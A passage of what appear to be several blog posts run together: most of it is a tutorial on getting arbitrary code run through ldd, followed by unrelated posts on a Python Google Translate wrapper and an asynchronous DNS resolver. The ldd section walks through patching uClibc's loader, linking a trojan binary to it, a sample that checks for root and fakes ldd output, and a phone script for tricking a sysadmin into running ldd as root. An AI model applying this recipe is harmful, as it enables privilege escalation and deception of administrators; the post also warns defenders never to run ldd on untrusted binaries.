[3] $ LD_TRACE_LOADED_OBJECTS=1 /lib/ld-linux.so.2 /bin/grep
        linux-gate.so.1 =>  (0xffffe000)
        libc.so.6 => /lib/libc.so.6 (0xb7f7c000)
        /lib/ld-linux.so.2 (0xb80d0000)

The first command [1] runs `ldd` on `/bin/grep`. The output is what we expect -- a list of dynamic libraries that `/bin/grep` depends on.

The second command [2] sets the LD_TRACE_LOADED_OBJECTS environment variable and seemingly executes `/bin/grep` (but not quite). Surprisingly the output is the same!

The third command [3] again sets the LD_TRACE_LOADED_OBJECTS environment variable, calls the dynamic linker/loader `ld-linux.so` and passes `/bin/grep` to it as an argument. The output is again the same!

What's going on here?

It turns out that `ldd` is nothing more than a wrapper around the 2nd and 3rd command. In the 2nd and 3rd example `/bin/grep` was never run. That's a peculiarity of the GNU dynamic loader. If it notices the LD_TRACE_LOADED_OBJECTS environment variable, it never executes the program, it outputs the list of dynamic library dependencies and quits. (On BSD `ldd` is a C program that does the same.)

If you are on Linux, take a look at the `ldd` executable. You'll find that it's actually a bash script. If you step through it very carefully, you'll notice that the 2nd command gets executed if the program specified to `ldd` can't be loaded by the `ld-linux.so` loader, and that the 3rd command gets executed if it can.

One particular case when a program won't be handled by `ld-linux.so` is when it has a different loader than the system's default specified in it's .interp ELF section. That's the whole idea in executing arbitrary code with `ldd` -- load the executable via a different loader that does not handle LD_TRACE_LOADED_OBJECTS environment variable but instead executes the program.

For example, you can put a malicious executable in ~/app/bin/exec and have it loaded by ~/app/lib/loader.so. If someone does `ldd /home/you/app/bin/exec` then it's game over for them. They just ran the nasty code you had put in your executable. You can do some social engineering to get the sysadmin to execute `ldd` on your executable allowing you to gain the control over the box.

Compiling the new loader.

Get the uClibc C library. It has pretty code and can be easily patched to bypass the LD_TRACE_LOADED_OBJECTS checks.

$ mkdir app
$ cd app
app$ wget 'http://www.uclibc.org/downloads/uClibc-0.9.30.1.tar.bz2'

Unpack it and run `make menuconfig`, choose the target architecture (most likely i386), leave everything else unchanged.

app$ bunzip2 < uClibc-0.9.30.1.tar.bz2 | tar -vx
app$ rm -rf uClibc-0.9.30.1.tar.bz2
app$ cd uClibc-0.9.30.1
app/uClibc-0.9.30.1$ make menuconfig

Edit .config and set the destination install directory to `/home/you/app/uclibc`.

# change these two lines
RUNTIME_PREFIX="/usr/$(TARGET_ARCH)-linux-uclibc/"
DEVEL_PREFIX="/usr/$(TARGET_ARCH)-linux-uclibc/usr/"

# to this
RUNTIME_PREFIX="/home/you/app/uclibc/"
DEVEL_PREFIX="/home/you/app/uclibc/usr/"

Now we'll need to patch it to bypass LD_TRACE_LOADED_OBJECTS check.

Here is the patch. It patches the `ldso/ldso/ldso.c` file. Save the patch to a file and run `patch -p0 < file`. If you don't do it, arbitrary code execution won't work, because it will think that `ldd` wants to list dependencies.

--- ldso/ldso/ldso-orig.c       2009-10-25 00:27:12.000000000 +0300
+++ ldso/ldso/ldso.c    2009-10-25 00:27:22.000000000 +0300
@@ -404,9 +404,11 @@
        }
 #endif
 
+    /*
        if (_dl_getenv("LD_TRACE_LOADED_OBJECTS", envp) != NULL) {
                trace_loaded_objects++;
        }
+    */
 
 #ifndef __LDSO_LDD_SUPPORT__
        if (trace_loaded_objects) {

Now compile and install it.

app/uClibc-0.9.30.1$ make -j 4
app/uClibc-0.9.30.1$ make install

This will install the uClibc loader and libc library to /home/you/app/uclibc.

That's it. We have now installed uClibc. All we have to do now is link our executable with uClibc's loader (app/lib/ld-uClibc.so.0). It will execute the code if run under `ldd`!

Creating and linking an executable with uClibc's loader.

First let's create a test application that will just print something when executed via `ldd` and let's put it in `app/bin/myapp`

app/uClibc-0.9.30.1$ cd ..
app$ mkdir bin
app$ cd bin
app/bin$ vim myapp.c

Let's write the following in `myapp.c`.

#include <stdio.h>
#include <stdlib.h>

int main() {
  if (getenv("LD_TRACE_LOADED_OBJECTS")) {
    printf("All your box are belong to me.\n");
  }
  else {
    printf("Nothing.\n");
  }
  return 0;
}

This is the most basic code. It checks if LD_TRACE_LOADED_OBJECTS env variable is set or not. If the variable set, the program acts maliciously but if it's not, the program acts as if nothing happened.

The compilation is somewhat complicated because we have to link with the new C library statically (because anyone who might execute our program via `ldd` will not have our new C library in their LD_LIBRARY_PATH) and specify the new loader:

app/bin$ L=/home/you/app/uclibc
app/bin$ gcc -Wl,--dynamic-linker,$L/lib/ld-uClibc.so.0 \
    -Wl,-rpath-link,$L/lib \
    -nostdlib \
    myapp.c -o myapp \
    $L/usr/lib/crt*.o \
    -L$L/usr/lib/ \
    -lc

Here is the explanation of options passed to gcc:

  • -Wl,--dynamic-linker,$L/lib/ld-uClibc.so.0 -- specifies the new loader,
  • -Wl,-rpath-link,$L/lib -- specifies the primary directory where the dynamic loader will look for dependencies,
  • -nostdlib -- don't use system libraries,
  • myapp.c -o myapp -- compile myapp.c to executable myapp,
  • $L/usr/lib/crt*.o -- statically link to initial runtime code, function prolog, epilog,
  • -L$L/usr/lib/ -- search for libc in this directory,
  • -lc -- link with the C library.

Now let's run the new `myapp` executable. First, without ldd:

app/bin$ ./myapp 
Nothing.

LD_TRACE_LOADED_OBJECTS environment variable was not set and the program output "Nothing." as expected.

Now let's run it via `ldd` and for the maximum effect, let's run it from the root shell, as if I was the sysadmin:

app/bin$ su
Password: 
app/bin# ldd ./myapp
<strong>All your box are belong to me.</strong>

Wow! The sysadmin just executed our exploit! He lost the system.

A more sophisticated example.

Here is a more sophisticated example that I just came up with. When run without `ldd` this application fails with a fictitious "error while loading shared libraries" error. When run under `ldd` it checks if the person is root, and owns the box. After that it fakes `ldd` output and pretends to have `libat.so.0` missing.

This code needs a lot of improvements and just illustrates the main ideas.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

/*
This example pretends to have a fictitious library 'libat.so.0' missing.
When someone with root permissions runs `ldd this_program`, it does
something nasty in malicious() function.

I haven't implemented anything malicious but have written down some ideas
of what could be done.

This is, of course, a joke program. To make it look more real, you'd have
to bump its size, add some more dependencies, simulate trying to open the
missing library, detect if ran under debugger or strace and do absolutely
nothing suspicious, etc.
*/

void pretend_as_ldd()
{
    printf("\tlinux-gate.so.1 =>  (0xffffe000)\n");
    printf("\tlibat.so.0 => not found\n");
    printf("\tlibc.so.6 => /lib/libc.so.6 (0xb7ec3000)\n");
    printf("\t/lib/ld-linux.so.2 (0xb8017000)\n");
}

void malicious()
{
    if (geteuid() == 0) {
        /* we are root ... */
        printf("poof, all your box are belong to us\n");
        
        /* silently add a new user to /etc/passwd, */
        /* or create a suid=0 program that you can later execute, */
        /* or do something really nasty */
    }
}

int main(int argc, char **argv)
{
    if (getenv("LD_TRACE_LOADED_OBJECTS")) {
        malicious();
        pretend_as_ldd();
        return 0;
    }
    
    printf("%s: error while loading shared libraries: libat.so.0: "
           "cannot open shared object file: No such file or directory\n",
           argv[0]);
    return 127;
}

Actually you can put the code you want to get executed right in the loader itself. This way the executable will always look clean.

Social engineering.

Most system administrators probably don't know that they should never run `ldd` on unfamiliar executables.

Here is a fake scenario on how to get your sysadmin run `ldd` on your executable.

Sysadmin's phone: ring, ring.

Sysadmin: "Mr. sysadmin here. How can I help you?"

You: "Hi. An app that I have been using has started misbehaving. I am getting weird dependency errors. Could you see what is wrong?"

Sysadmin: "Sure. What app is it?"

You: "It's in my home directory, /home/carl/app/bin/myapp. Sometimes when I run it, it says something about 'error while loading shared libraries'."

Sysadmin: "Just a sec." noise from keyboard in the background

Sysadmin: "What was it again? It must be some kind of a library problem. I am going to check its dependencies."

You: "Thanks, it's /home/carl/app/bin/myapp."

Sysadmin: "Hmm. It says it's missing `libat.so.0`, ever heard of it?"

You: "Nope, no idea... I really need to get my work done, can you check on that and get back to me?" evil grin in the background

Sysadmin: "Okay Carl, I'm gonna call you back."

You: "Thanks! See ya."

You: `mv ~/.hidden/working_app ~/app/bin/myapp`.

After a while.

Sysadmin calls: "Hi. It seems to be working now. I don't know what the problem was."

You: "Oh, okay. Thanks!"

Lesson to be learned: Never run `ldd` on unknown executables!

P.S. If you enjoyed this article subscribe to my future posts! I have many more quality articles coming.

Google Python Search LibraryI have extended my xgoogle library with a Python module for Google Translate.

The new module is called "xgoogle.translate" and it implements two classes - "Translator" and "LanguageDetector".

The "Translator" class can be used to translate text. It provides a function called "translate" that takes three arguments - "message", "lang_from" and "lang_to". It returns the translated text as a Unicode string. Don't forget to encode it to the right encoding before outputting, otherwise you'll get errors such as "UnicodeEncodeError: 'latin-1' codec can't encode characters in position 0-3: ordinal not in range(256)"

Here is an example usage of the "Translator" class:

>>> from xgoogle.translate import Translator
>>>
>>> translate = Translator().translate
>>>
>>> print translate("Mani sauc Pēteris", lang_to="en")
My name is Peter
>>>
>>> print translate("Mani sauc Pēteris", lang_to="ru").encode('utf-8')
Меня зовут Петр
>>>
>>> print translate("Меня зовут Петр")
My name is Peter

If "lang_from" is not given, Google's translation service auto-detects it. If "lang_to" is not given, it defaults to "en" (English).

In case of an error, the "translate" function throws "TranslationError" exception with a message why the translation failed. It's best to wrap calls to "translate" in a try/except block:


Program:

>>> from xgoogle.translate import Translator, TranslationError
>>>
>>> try: 
>>>   translate = Translator().translate
>>>   print translate("")
>>> except TranslationError, e:
>>>   print e

Output:

Failed translating: invalid text 

The "LanguageDetector" class can be used to detect the language of the text. It contains a function called "detect".

The "detect" function takes only one argument - message - the piece of text you to detect language of.

It returns a "Language" object that has four properties:

  • lang_code - two letter language code for the given language. For example "ru" for Russian.
  • lang - the name of the language. For example, "Russian".
  • confidence - the confidence level from 0.0 to 1.0 that describes how confident the detector was about the language of the given text.
  • is_reliable - was the detection reliable.

Here is an example of "LanguageDetector":

>>> from xgoogle.translate import LanguageDetector, DetectionError
>>>
>>> detect = LanguageDetector().detect
>>> english = detect("This is a wonderful library.")
>>> english.lang_code
'en'
>>> english.lang
'English'
>>> english.confidence
0.28078437000000001
>>> english.is_reliable
True

In case of a failure "detect" raises a "DetectionError" exception.

These two classes interact with the Google Ajax Language API to do their job. Since this Ajax service returns JSON string, you'll need to install simplejson Python module. It should be as easy as typing "easy_install simplejson".

Download "xgoogle" library:

Download: xgoogle library (.zip)
Downloaded: 22947 times.
Download url: http://www.catonmat.net/download/xgoogle.zip

I haven't yet posted this library to pypi but I will soon do it.

Asynchronous DNSOnce upon a time, I had to quickly resolve thousands of DNS names. My first solution was to call gethostbyname repeatedly for each of the hosts. This turned out to be extremely slow. I could only do 200 hosts in a minute. I talked with someone and he suggested to try to do it asynchronously. I looked around and found adns - asynchronous dns library. Since I was writing the code in Python, I looked around some more and found Python bindings for adns. I tried adns and - wow - I could do 20000 hosts in a minute!

In this post I want to share the slow code and the fast asynchronous code. The slow code is only useful if you need to resolve just several domains. The asynchronous code is much more useful. I made it as a Python module so that you can reuse it. It's called "async_dns.py" and an example of how to use it is included at the bottom of the post.

Here is the slow code that uses gethostbyname. The only reusable part of this code is "resolve_slow" function that takes a list of hosts to resolve, resolves them, and returns a dictionary containing { host: ip } pairs.

To measure how fast it is I made it resolve hosts "www.domain0.com", "www.domain1.com", ..., "www.domain999.com" and print out how long the whole process took.

#!/usr/bin/python

import socket
from time import time

def resolve_slow(hosts):
    """
    Given a list of hosts, resolves them and returns a dictionary
    containing {'host': 'ip'}.
    If resolution for a host failed, 'ip' is None.
    """
    resolved_hosts = {}
    for host in hosts:
        try:
            host_info = socket.gethostbyname(host)
            resolved_hosts[host] = host_info
        except socket.gaierror, err:
            resolved_hosts[host] = None
    return resolved_hosts

if __name__ == "__main__":
    host_format = "www.domain%d.com"
    number_of_hosts = 1000

    hosts = [host_format % i for i in range(number_of_hosts)]

    start = time()
    resolved_hosts = resolve_slow(hosts)
    end = time()

    print "It took %.2f seconds to resolve %d hosts." % (end-start, number_of_hosts)

And here is the fast code that uses adns. I created a class "AsyncResolver" that can be reused if you import it from this code. Just like "resolve_slow" from the previous code example, it takes a list of hosts to resolve and returns a dictionary of { host: ip } pairs.

If you run this code, it will print out how long it took to resolve 20000 hosts.

#!/usr/bin/python
#

import adns
from time import time

class AsyncResolver(object):
    def __init__(self, hosts, intensity=100):
        """
        hosts: a list of hosts to resolve
        intensity: how many hosts to resolve at once
        """
        self.hosts = hosts
        self.intensity = intensity
        self.adns = adns.init()

    def resolve(self):
        """ Resolves hosts and returns a dictionary of { 'host': 'ip' }. """
        resolved_hosts = {}
        active_queries = {}
        host_queue = self.hosts[:]

        def collect_results():
            for query in self.adns.completed():
                answer = query.check()
                host = active_queries[query]
                del active_queries[query]
                if answer[0] == 0:
                    ip = answer[3][0]
                    resolved_hosts[host] = ip
                elif answer[0] == 101: # CNAME
                    query = self.adns.submit(answer[1], adns.rr.A)
                    active_queries[query] = host
                else:
                    resolved_hosts[host] = None

        def finished_resolving():
            return len(resolved_hosts) == len(self.hosts)

        while not finished_resolving():
            while host_queue and len(active_queries) < self.intensity:
                host = host_queue.pop()
                query = self.adns.submit(host, adns.rr.A)
                active_queries[query] = host
            collect_results()

        return resolved_hosts

if __name__ == "__main__":
    host_format = "www.host%d.com"
    number_of_hosts = 20000

    hosts = [host_format % i for i in range(number_of_hosts)]

    ar = AsyncResolver(hosts, intensity=500)
    start = time()
    resolved_hosts = ar.resolve()
    end = time()

    print "It took %.2f seconds to resolve %d hosts." % (end-start, number_of_hosts)

I wrote it in a manner that makes it reusable in other programs. Here is an example of how to reuse this code:

from async_dns import AsyncResolver

ar = AsyncResolver(["www.google.com", "www.reddit.com", "www.nonexistz.net"])
resolved = ar.resolve()

for host, ip in resolved.items():
  if ip is None:
    print "%s could not be resolved." % host
  else:
    print "%s resolved to %s" % (host, ip)

Output:

www.nonexistz.net could not be resolved.
www.reddit.com resolved to 159.148.86.207
www.google.com resolved to 74.125.39.99

Download "async_dns.py":

Download: async_dns.py
Downloaded: 4372 times.
Download url: http://www.catonmat.net/download/async_dns.py

I hope someone finds this useful!